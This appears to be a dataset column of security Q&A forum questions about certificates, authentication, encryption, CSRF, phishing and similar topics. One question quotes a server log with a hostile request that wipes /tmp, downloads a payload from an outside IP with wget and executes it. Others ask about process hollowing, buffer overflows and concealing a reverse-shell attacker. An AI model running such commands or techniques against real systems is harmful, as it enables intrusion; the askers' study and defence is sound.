instruction
stringlengths
24
29.9k
I own a ZTE Axon 7 (model 2017G) that I purchased secondhand from a reputable vendor in Germany ca. 3 years ago. The phone has been working well, and I updated the OS to Android 8.0. manually earlier this year using an official image from ZTE. A severe case of butterfingers affected me yesterday (and I guess today), an...
where do I find information on all the fields that I can use shodan to search by? For example I can find a specific ssl vendor's certificates with ssl.cert.issuer.CN=asdf but what other fields can I search by? Honestly Shodan's documentation is driving me nuts. It's so tutorial driven, and that's not what I need.
I am about to sign up for an online school, which is an accredited statewide online school, and notice that the password they want me to enter is fully visible on the form. Should I be concern about their information security? Does a form like this indicates that the way the way the school protects students' data is no...
I am asking this question because in this article https://engineering.fb.com/security/delegated-credentials/ there is a sentence stating "We securely distribute private keys to the servers". I am trying to understand how that is done.
I'm working on a legacy application that issues JWTs with a short expiry time. They do not have refresh token functionality implemented. So obviously while using refresh tokens would be the right solution, for the sake of argument assume that's not going to happen. It occurs to me that 'Hey I could just store the usern...
I use an Apache proxy to funnel traffic to an IIS server. The IIS server sends me emails if some bad actor attacks my site with an sql injection attack. It captures their IP address, and sends me the URL that was used. The other day I got 8,400 emails in 50 minutes, nothing my mail server can't handle, but all from som...
I've tried searching for methods of scanning files within virtualbox, but most (if not all) of what I find is discussion about studying programs that are already known to be malware. I'm trying to determine if something is malware or not, and I don't exactly know what to do to determine this manually rather than just r...
Today I received an email from a person in "critical health condition" who wants to give me about $10 million. It is clearly some kind of scam. What should I do with the email besides not replying? Is there an organization I can report the spam to? Perhaps some kind of international spam-fighting organization or a glob...
Several sites, like this states that You can obtain a digital signature from a reputable certificate authority such as Sectigo But digital signature is something you create using a piece of text and your private key using a signing algorithm. How can I obtain a digital signature from a CA? Shouldn't I just be receivi...
I'm studying Internet Security and I learned something about code injection in older websites (using the string ' OR 1 == 1 // as a username will log in with any password provided); but what if a password related to a username is stored in the server in a folder with the following path: /userdata/passwords/<username> ...
I'm seeing a lot of tech support scam videos on YouTube, which made me think; do legitimate tech support companies use remote control for regular customer service calls? I remember calling Lenovo tech support from their website a while back (I double checked it was their official site because I'm paranoid) and they had...
Despite best efforts it is pretty clear that most users reuse their credentials, especially for what they consider non-critical sites such as forums. While TFA does mitigate the potential damage of this a bit (aside from its other benefits of course), a compromised database of one providing using TFA can still lead to ...
I am trying to reproduce HTTP request smuggling using an Apache HTTP Server as a reverse proxy (using mod_proxy) and a Tomcat Server in the back-end. Is it possible to force either Apache Server or Tomcat to ignore Transfer-Encoding in requests (and only use Content-Length)? Or is request smuggling simply not possible ...
Can't we design an OS in such a way that it doesn't allow anyone (not even root) to read the passwords file? Then there will be no need for encrypting the passwords. Why can't we hard-code a computer to hide it's password file? I was reading "Cuckoo's egg" by Clifford Stoll. On page 32, I didn't understand why encrypti...
Most tutorials on the net only mention sending the digital signature attached to the document, but without the digital signature certificate, it'll be impossible for receivers to verify the signature. I'm assuming that the digital certificate is somehow sent alongside the signature but I can't seem to find any source m...
After a vulnerabilities scan, I found that the csfcfc cookie does not have the Secure attribute. JSESSIONID has httpOnly and Secure attributes. Is there a way to force it? I found an answer for JBoss but can't find anything about Glassfish. This is the session-config in my web.xml: <session-config> <session-timeou...
Having created a certificate for electronic signing within Adobe Acrobat DC, can I authenticate documents signed using it by issuing a signed paper statement to recipients stating that it would be authentic if the properties of the e-signature show the public key to be 'xxxxx'? In other words, could another party creat...
Recently Signal started forcing users to create a pin. I'm curious about the feature - doesn't it make Signal less secure if their database gets compromised? In other words, suppose that I'm chatting with someone from my family and they set their pin to 1234. If Signal's database leaks, is it possible to brute-force pa...
Usual password authentication systems do not store passwords directly on the server, but only hashes of those passwords. Why do fingerprint authentication systems not offer this possibility?
On 2nd July, the UK's national news outlets broke the story of an "unprecedented" 4-year-long, Europe-wide investigation that, in the UK, resulted in the arrest of 746 criminals, including many high-profile "kingpins" of the criminal underworld as well as corrupt police officers. According to The Mirror: NCA Director ...
I'm a senior undergraduate majoring in computer science. I recently took a computer security class where instead of exams we had a final project that could be anything related to computer security. So for our project, we designed a cloud based password manager that works on almost every existing site with the key idea ...
We have a website hosted behind WAF(FortiWeb) and Firewall (FortiGate). The WAF already has the server valid SSL Certificate from public CA. Do we need to install SSL certificate on Firewall also for inbound traffic to make it more secure ? Will Unscanned https traffic reach the firewall first compromise the network ?...
I understand GCM Crypto uses ESP Encryption only for ESP and Authentication algorithm. whereas AES 256 SHA256 uses AES for ESP Encrypt and SHA256 for Auth algorithm. Could someone help clarify the reason of getting a better performance with AES256GCM as compared to ASE256SHA256.
I am trying to create a web form, where the user can login without creating/entering a password. Assume the following pre-requisites are met: The user and server have pre-generated a public/private key pair (on curve ed25519). The user and server both know each others public keys. A simple protocol might look like th...
If I use only a computer, can I disable the password when I log in? That is, the user account has a password, but in the settings I turn on autologin: /etc/lightdm/lightdm.conf [Seat:*] autologin-user=user autologin-user-timeout=0 Is this an Internet attack vulnerability?
Assuming ISP gives only 1 external IP and you have few devices that use this IP. So you will have a router and few PC's with same external IP and different local IP. When all PC's are online and one of them are vulnerable to EternalBlue, Bluekeep or something else. When attacker scans external IP. Will he see that IP i...
I'm questioning the password used in a key derivation function, whether It makes sense to make it unique for every generated symmetric key and why
I obtained an SSL certificate from LetsEncrypt for my web application using Apache web server. LetsEncrypt generated these 4 files: cert.pem chain.pem fullchain.pem privkey.pem As I understand, cert.pem is the public key. Now I tried to verify that this public key is indeed being served by openssl s_client -connec...
I'm developing a business web application for my client, in which he can upload images (e.g. floor plans, photos of object etc.) and documents of different objects (word, excel etc.). The images should be displayed when someone logs in the website and selects an object. I'm using the Google Cloud Storage platform as th...
I keep reading that in an X.509 certificate chain of trust that the "Issuer Name" in a certificate that has been signed by the Issuer must "match" the "Subject Name" of the Issuer's certificate. Exactly how is this match determined? Do all of the RDNs (Relative Distinguished Names) have to match between both the Subj...
Is it possible to hide strings of text in one picture without coupling the strings in a file? I have only been able to find tools that allow for one.
I have cleared all the cookies on my Chrome browser, closed the browser and opened Chrome, navigated to chrome://settings/siteData I see two new Facebook fr and sb cookies created right away, before visiting Facebook. How did these two cookies get created?
I'm building a user authentication system in Nodejs and use a confirmation email to verify a new account is real. The user creates an account, which prompts him/her to check the email for a URL that he/she clicks to verify the account. It works great, no issues. What's unusual is that in testing, when I email myself (t...
I've just started in penetration testing with metasploitable and currently trying to learn file upload vulnerability present in DVWA module. I know that somehow upload is preventing files other than images to be uploaded but I don't understand how. I tried to look page source of 'upload file' webpage but I don't see an...
I am using the most verbose debug option of ssh (concretely: OpenSSH_8.2p1) ssh -vvv and I am wondering what information the output exposes. Of course the output contains the username and the server one is trying to connect to, however there is quite a lot more. What information is exposed by this debug information? Wh...
I have been learning and implementing Process Hollowing attacks, and even after I got the thing work, I have some questions. Why aren't we building the IAT when we load our injected PE? All we do is copy the headers and the sections, fix reallocations (if there is a need in some) but never touching the IAT. I don't un...
I've read articles suggesting that passwords will eventually go the way of the dinosaur only to be replaced by biometrics, PINs, and other methods of authentication. This piece claims that Microsoft, Google, and Apple are decreasing password dependency because passwords are expensive (to change) and present a high secu...
Problem When I browse this forum, I constantly read about the weaknesses of popular "secure" messaging applications such as Signal, Telegram, and WhatsApp. Some of the most notable critiques regarding their design and operation are: Phone number requirement. Privacy is fundamentally compromised by necessitating users ...
One of the companies I worked for used client-side hashing to minimize risk when logging the password in the server logs. Can this be a good reason to implement client-side hashing?
I have a system with an uploading file feature and it's protected by an antivirus that scans the uploaded files. The AV detects malicious files like EICAR files, msfvenom payloads...but not a JS file with an XSS inside. I would like to know why that is.
I'm starting to learn about buffer overflow, and I'm trying to change the contents of the return address to a specific location using gdb, but the problem is that the address starts with some zeros. For example, I want to change the return address to: 0x0000555555554816. I tried to use Perl and passing this address as ...
I am writing a mobile app that uses a read only REST service that sits behind our company firewall. The actual data supplied by the REST service is not private but I am concerned with a hacker using it to get behind the firewall. I have found lots of ideas on how to use JWTs to secure REST. Are these methods typically...
I'm working on some software that can be self-hosted, and it includes a component that can be downloaded and installed on end user machines (Windows only). The download comes from the self-hosted server, not from a central location, and that cannot change. How can we verify that the .msi the program downloads to update...
I'm new to Software security and I'm studying it now at the university. I had some doubts about the Format String exploit, in particular how to count the length (in number of bytes) of a format string exploit. Suppose that I have the following vulnerable code: 04 int guess(char *user) { 05 struct { 06 int ...
We have 3-4 S/4 HANA applications in our environment and want to enable HTTP Security Headers, but couldn't figure out how to go about it. We then approached SAP directly and even their solutions are not working, and their support team has a pretty vague and dissatisfactory answer,they said that the application doesn't...
I'm attempting to register an e-mail account without destroying my privacy. The reason is simply that one is necessary to be able to register on a different service (web host for my new, very non-shady business venture). Tutanota, ProtonMail and Hushmail are apparently the only (serious-looking) services in existence w...
I’ve been looking to purchase a new laptop and I need to have security in mind. I’ve specifically been looking for laptops with discrete or integrated TPM because it’s been my understanding that TPM would improve disk encryption security, but after doing some more research I’ve heard a lot of sources saying that it doe...
I used an SPF record finder online, and the result of this test was they already have an SPF record but I still can send an email as their domain exactly! So, do SPF records prevent email spoofing attacks? If it does, why can I still send an email as their domain? If it doesn't, how can we really prevent email spoofing...
In a Samsung Galaxy S series, I've noticed a notification saying that your network might have been watched and is not safe. Is it possible for someone to remotely install a certificate and eavesdropping on communications? What if he controls the mobile communication network ISP? Communications are encrypted, though a m...
This link says that the requesting server creates the public-private key pair and sends the public key to the CA inside the CSR. However, DigiCert says: The CSR is submitted to a Certificate Authority (CA) which uses it to create a public key to match the private key without compromising the key itself. I'm confused....
I would like to know if the Basic Authentication header for site A can be sent from site B when trying to access site A for non-GET requests (which would make the site vulnerable to CSRF attacks). I tried to call a site on localhost from a HTML file (at file://), and from what I see the Authorization header is sent. Is...
It's very common to hear about encryption in web browsers and apps, but that's all about the internet. But what about mobile communications that use a SIM card, like ordinary text messages and voice calls, that does not require internet access. How are they encrypted ? I've heard of protocols like 3GPP, and many others...
I know in TLS, the client would send a CertificateVerify message for the server to confirm the client's identity through means such as CA but what if the client never sent this information? Is it possible for an attacker to use this opportunity to hijack the client's session through packet sniffing and create it's own ...
Could anyone explain why the bolded part of the wrap key description? Wraps a symmetric key using a specified key. The WRAP operation supports encryption of a symmetric key using a key encryption key that has previously been stored in an Azure Key Vault. The WRAP operation is only strictly necessary for symmetric keys...
Users have the possibility to upload a sensitive personal file to a specific website. After uploading, only the user himself and the administrator of the website have the ability to download the file again. All files of any user are uploaded to the following folder: https://example.com/folder/uploads/. Before a file is...
I found too many events in Suricata after recent update regarding this rule: alert ip any any -> any any (msg:"ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free"; ip_proto:4; metadata: former_category EXPLOIT; reference:url,www.jsof-tech.com/ripple20/; classtype:attempted-admin; sid:2030388; rev:1; metadat...
I've made a CSR (Certificate Signing Request) in order to better understand how a PKI could be made and how it works. Using the following commands openssl req -new -newkey rsa:1024 -nodes -out ca.csr -keyout ca.key openssl req -text -noout -verify -in ca.csr I obtain the following output Certificate Request: Data...
I am looking to set a third party application to authenticate with our domain. The application supports LDAPv3 and we have opted to use the start StartTLS extension to encrypt the credentials from the source host application towards the domain server. Having said this, I am at a loss as to what TLS version is used in S...
If a site is enforcing HSTS, does that prevent packet capturing of a GET requests in Wireshark? If it prevents it, is it possible to achieve the same using Bettercap or any other alternatives? Scenario: The response to the GET request is a token value, which is sensitive and can be used for other functionalities on the...
I've had this difficulty for a while, and I hope to get some feedback or referral to the sites where this problem may be discussed. Nowadays all of us have multiple accounts, both personal and work-related (logins to websites or applications at work, logins to personal computers and mobile devices, etc.). I personally ...
During a security assessment I noticed that Firefox automatically set the SameSite value of a session cookie to Lax. According to the Mozilla specs, this is the case for 'modern browsers'. The SameSite attribute set to Lax seems to protect against CSRF (every cross-origin request that's doesn't use GET). Obviously, out...
If bitlocker was configured for a user not to input a PIN; and the device got lost/stolen; is there a risk of the data on the hard disk being exposed? With no PIN enabled; is that essentially as good as having no hard disk encryption at all? Am i right in assuming that not enabling PIN; is a self decryption device?
I am writing a C# .NET application. For my application the data of the users should be encrypted in the database. The users should also be able to share data with other users. To that end I want to use RSA encryption. My intended implementation is as follows: The public key of the user is stored in the database. Data t...
CAPTCHA stands for "Completely Automated Public Turing Test to Tell Computers and Humans Apart", but we only consider one half of it i.e. a test to separate genuine humans from bots. Can a program/test exist that can be only "solved" by computers/bots and not by humans? If not, what prevents such a program from existin...
Sometimes I realize that I receive phishing emails just after doing some operations on the web. For instance, I was trying to pay taxes from my bank account (website was trusted 100%, I checked the signature), just after a few minutes I receive a phishing email from bank with a fake email address. Timing was very close...
This seems like it should easily documented but I am unable to find. My c# code does this to create a pfx file. X509Certificate2 cert = store.Certificates.Find(X509FindType.FindByThumbprint, thumbPrint, false); File.WriteAllBytes("certFile.pfx", cert.Export(X509ContentType.Pfx, password)); The clas...
I was wondering if the following password-reset mechanism is safe: The user clicks on 'I forgot my password' and enters his mail. After he has submitted, a security_token gets generated. This token consists of the following combination: entered_email + timestamp + a randomized string of 15 truly random bytes. The rando...
Background: My buddy is a freelance journalist working on a story on one of the bigger software companies (a household name, starts with an A). Anyway, he asked me to take a look at his iPad because while he’s versed in InfoSec, this may be outside of his scope. While examining the iPad I noticed that: Entries seem t...
I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: 170.81.46.70 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world" 93.157.62.102 - - "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/l...
I am trying to use WordPress from Azure marketplace to deploy a web app. I ran a Fortify scan on entire code base (wwwroot) which includes wp-admin, wp-includes, wp-content and other boilerplate php files. There are various issues found like below: What else can I do for static code analysis to detect code vulnerabili...
We have a website using PWA Client calls / Mobile APP, all using the same APIs. We have APIs Exposed to Public. Currently, our APIs are not secure meaning that anyone can check APIs signature via developer tools/proxy tools and hit the API. We want our APIs to be hit by verified clients. Verified clients do not mean lo...
If you can't trust your own computer, would installing Qubes on it do any good? Or is it already too late if your machine might be infected?
I am new to OSSEC and Cyber Security in general and would like to understand it a bit better. OSSEC provides so called "Rules Groups" alerts get assigned to and I would like to understand those groups a bit better. https://www.ossec.net/docs/docs/manual/rules-decoders/rule-levels.html#rules-group Some of the 12 groups ...
According to the OWASP CSRF Prevention Guide if the server fails to ...verify the existence and validity of the token in the request compared to the token found in the user session ... then the request should be aborted, session of the user terminated and the event logged as a potential CSRF attack in progress. Howev...
An e-commerce site should reserve products for a user while they're going through the payment process (more info). This creates a potential denial-of-service risk where an attacker could reserve many products and never complete payment - reserving all the stock and preventing legitimate sales. How can this be defended ...
I'm looking for a "tamper proof" way, if there is such a thing, to monitor what a developer/engineer does on a given system. To expand a bit more about this, we have several systems that run a Ruby on Rails technology stack with Ubuntu Docker containers on K8S, and for our PCI compliance, we require a monitoring soluti...
If someone hack my WiFi or they know the password . Can they see or will have access to any of my data stored in my pc connect on the same network. Or can they control my pc or download anything ?
I implemented a passwordless authentication with a good UX in mind. But I am not a security expert so I am asking for your advice. This is the authentication flow: User types in email address client send email to API API creates User if not exists API generates a short living jwt with a UUID and saves the user id and ...
I left my old job a few years back and wanted to check a few of my old pdf payslips but for the life of me I can't remember the password. I've tried using John The Ripper in incremental mode because I do know it wasn't a complicated password (I never changed the one they provided me when they setup Sage as I never saw ...
Would it not be useful for account providers that allow online/phone signup/ordering to immediately verify the email address supplied to them? I was forced to ponder this recently when I became the apparent victim of identity theft. Someone used my name and email address when opening an account with a US-based Interne...
If an attacker successfully installed a backdoor that connects to his computer via a reverse shell, how can the attacker hide his IP address? I'd guess he can't use Tor or a VPN, because packet forwarding would be quite impossible (is that correct?). Maybe he can use a different bought or hacked server as a proxy? How ...
Are the 'ca' policy values that are present in the OpenSSL configuration file applied when the 'ca' command is used to create a certificate AND when the 'ca' command is used to sign an existing certificate? For example, suppose the following policy section is present in an OpenSSL configuration file: [ policy_basic ] ...
CORS is a HTTP Suite header that “relax” the SOP. One of the CORS misconfigurations is about to reflect without reg exp the “Origin” client header into “ACAO” response header. If it happens with “ACAC:true” every cross-domain HTTP request is allowed. If an attacker induces a victim to visit with another tab of the brow...
Is there any good alternatives to the lair-framework. I think that was an awesome platform, and unfortunately its not maintained anymore and no more updates to it. But i have tried all other kinds of pentest collaboration tools (Faradaysec, dradis, and a few other ones) but the only one that i can say came close to lai...
I mainly use Linux so I'm not well-versed on how Windows and its privileges work. I've recently learned to use Metasploit and meterpreter on Windows boxes. Previous research This answer has given an overview of how meterpreter migrates on Windows. This article has addressed process migration on Linux My questions What...
I am improving one of the DRMs that I'm using for my software, and I have a few questions about how to best implement transferable licenses for offline computers. But first, a disclaimer - I am very well aware that a perfect DRM does not exist, that they all can be cracked, and that there are off-the-shelf DRMs availab...
Given the SHA-256 hash, the size and the encoding of the original string, is it possible to recover the string via brute force? How many string of a given size will result in the same hash?
I'm struggling to find relevant section in RFCs, and I hope someone here can help me. How does - per specification - subCA revocation affect leaf certificates issued from this CA prior to revocation? I don't only mean TLS certificate, but also code signing, time stamping, S/MIME. My take: Depends on revocation reason ...
I am trying to exploit a bufferoverflow on raspberry pi 4 which makes use of Cortex-A72 (ARM v8) 64-bit SoC. The linux kernel version is v4.19 and the OS a Debian Buster compiled for the raspberry pi arm architecture. Vulnerable code #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int ma...
I am currently developing against a RESTful API that seemingly has a rather weird auth flow. I got an API key consisting of an ID (public) and a "secret" (which seems to be a UUID). Now, whenever I want to call the API, I have to do the following: Create JSON request body md5-Hash of (API-URL, Request, ID, Secret) Set...
In Windows 10: When I load a certficate into the "Current User" store, it puts a private key file here: C:\Users\[userID-A]\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-xxx\pkfileqreflr8029r... When I load a certficate into the "Local Machine" store using a different UserID-B, I don't see this path at all: C:\Users\...
As discussed in this answer, gpg does not offer the capacity for subkeys to certify (eg. "sign") other keys, though there may be good reason why it should, and they do sign at least one key. As a practical matter, for those of use who keep our master secret key, in which resides the certifying capacity, offline, this ...
I am using laravel on shared hosting. Under my domain in my folder is the laravel app. Now I see online that many people do weird stuff with the laravel public folder, they either move it to a different location or create a sys link, but why? Isn't the laravel setup secure? As far as I understand nothing below the publ...
I recently set up a personal website. It contains nothing but a few pieces of information presented in a pretty way; there's no associated database or anything, it wasn't even wordpress - just hardcoded HTML and CSS with some very rudimentary javascript. Because the site was so minimal, I opted not to pay for an SSL ce...
I have a Node.js/Express 4/JWT user authentication service using Passport.js, with Sequelize and MySQL for database. In my service, upon signing up/resetting a password, the user will be redirected to a page telling them to click the link in the email that was just sent, or click a button to resend the email (if they ...
During a penetration test, I ran across a server that was storing passwords in its database in what seems to be a binary array of sorts: password_table 1,12,12,12,122,21,13,00,00,00,000 11,112,443,12,31,09,100 110,1123,108,117,108,62,62 (slightly edited for confidentiality) I've additionally managed to obtain a passw...
I am working on an application. There is a new feature implemented where a user create some IDs and secret keys for that application. I have observed that there is no rate limit for creating those. I have sent the request to intruder and created nearly 11000 sets of IDs and secrets. So whenever any user tries to access...
A network administrator at my organization (let's call him "Bill") wants to configure an internal DNS with the live top-level domain (TLD) .int for internal IP address resolution (for Active Directory, internal websites, etc.). For example, the domain exampleinternalsite.int would resolve to the some internal site that...
I've been working on a full stack project recently for my own amusement and would like to add authentication services to this project, but want to make sure I'm doing it the right way. And before anyone says it, yes, I know: a well-tested and trusted authentication framework is highly suggested as it's likely you won't...
I'm not from Information Security or any IT related area. But I want to know if there is any security reason for my digital bank to demand my phone to be on "Automatic Date & Time"? For example, if I'm abroad, I cannot transfer some money to a friend, because a dialog box says that my date and time is incorrect. Is tha...